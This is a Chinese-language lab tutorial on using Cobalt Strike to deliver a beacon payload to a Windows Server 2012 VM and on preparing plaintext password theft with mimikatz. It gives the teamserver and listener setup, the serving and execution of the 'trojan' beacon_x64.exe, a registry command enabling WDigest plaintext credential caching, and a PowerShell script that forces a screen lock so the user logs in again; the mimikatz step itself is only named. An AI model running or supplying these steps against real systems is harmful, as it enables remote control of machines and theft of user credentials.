cs与msf权限传递,以及mimikatz抓取win2012明文密码
1、准备三台虚拟机:
一台安装有cs的kali,网络模式为nat,
一台Win2012,有两张网卡,一张为NAT模式,一张为仅主机模式,分别对应内外网,
一台win10,网络模式为仅主机模式,模拟我们的内网主机。
2、在kali上面启动我们的cs服务区端
./teamserver ip password
新开一个终端,开启我们的cs客户端
./cobaltsrtike-client.sh
弹出登录界面,输入连接密码进入
3、点击cobaltstrike----listeners----add
新建一个监听者,名字为cs_win2012,添加http hosts为本机IP地址,httpport 为12345
点击payloads---选择windows stagerness payload -----listeners----beacon_x64.exe,这是我们的木马文件
4、进入到我们的kali终端,检查刚才的木马文件有没有生成,然后
python3 -m http.server 9999
5、到我们的win2012的浏览器输入http://192.168.163.164:9999/进行连接,找到我们的beacon_x64.exe,下载并运行
6、返回到我们的kali的csserver,看是否连接成功,右键interect,输入shell ipconfig查看
在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,我们可以使用修稿注册表的形式来进行读取
通过修改注册表来让Wdigest Auth保存明文口令:
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
如需恢复原样,只需将上图REG_DWORD的值1改为0即可。
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
修改注册表之后,修改了之后需要用户注销或者重新登陆之后才会生效。
使用强制锁屏脚本来实现
把如下代码保存为lock.ps1
Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
输入
powershell -file lock.ps1
抓取明文密码